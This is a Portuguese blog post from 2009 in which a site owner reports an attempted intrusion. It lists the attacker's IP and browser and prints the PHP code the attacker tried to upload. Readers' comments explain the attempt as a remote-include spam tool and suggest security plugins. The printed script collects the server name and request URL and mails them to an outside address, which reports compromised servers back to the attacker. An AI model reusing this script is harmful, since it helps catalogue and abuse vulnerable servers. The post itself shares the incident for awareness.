Se esta querendo aprender ou iniciar novos projetos em Flex, clique aqui

Hoje de manhã acordei com uma surpresa. Um e-mail automático enviado pelo Blog informando que as 09:26:37 estavam tentando invadir o site.

Se alguém conhece, ele usou:

Navegador: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5
IP: 200.58.203.127
Data: 2009-06-16 09:26:37

Tentaram postar o seguinte código dentro do servidor.

<?
$data = date( "d/m/Y");
$hora = date ("H:i:s", time(void) );

$fstring = $_SERVER['PHP_SELF'];
$string = $_SERVER['QUERY_STRING'];
$servidor = $_SERVER['SERVER_NAME'];

$haua = ereg_replace('CMD', 'CMD', $string);

$todo = 'http://' . $servidor . $fstring . '?' . $haua;
$cod_todo = ($todo);
$cod_servidor = ($servidor);

$para1 = "n3g0ci4d0r@hotmail.com";
$para2 = "";
$assunto = "SERVIDOR: $cod_servidor";

$mensagem = "DATA: $data<br>";
$mensagem .= "HORA: $hora<br>";
$mensagem .= "SERVIDOR: $cod_servidor<br>";
$mensagem .= "URL: $cod_todo<br>";

$headers = "MIME-Version: 1.0";
$headers .= "Content-type: text/html; charset=iso-8859-1";
$headers .= "From: $cod_servidor <test@test.com>";

$mail = mail($para1, $assunto, $mensagem, $headers);
if ($mail==1) {
mail($para2, $assunto, $mensagem, $headers);
echo ('OK Email enviado');
} else {
  echo('ERRO');
}
?>

Bom este foi mais uma tentativa frustrada de invasão.

Gostou? Não esqueça de curtir!

Ou compartilhe o link com seus amigos

4 comentários

Deixe uma resposta

  1. No meu WP tive um problema similar mas foi nas próprias páginas onde o cara inseriu algumas linhas em base64 nos scripts dos pugins.

    Fui avisado pelo google mesmo (legal pakas !) e decidi instalar a versão mais atual e também um plugin chamado WP security scan que da uma checada nas PERMISSÕES de todas as pastas do WP ... cada vez que vou atualizar é uma confusão e isso resolveu dando recomendações de onde pode ser o que tipo 777, 755 etc .

    Não custa incrementar mais um cadeadinho pra dificultar

    http://semperfiwebdesign.com/plugins/wp-security-scan/

    Abraço

     
  2. Amigo, não tentaram invadir seu blog, apenas o usaram para por meio de uma falha fazer um include remoto de um aplicativo para enviar spam via php por meio de seu servidor.

    Recomendo verificar atualiações do wordpress.

     
  3. Oi, existe o http://www.ipgeo.com.br mas é uma versão beta e pelo que vi hoje não está funcionado bem, mas outros dias já funcionou...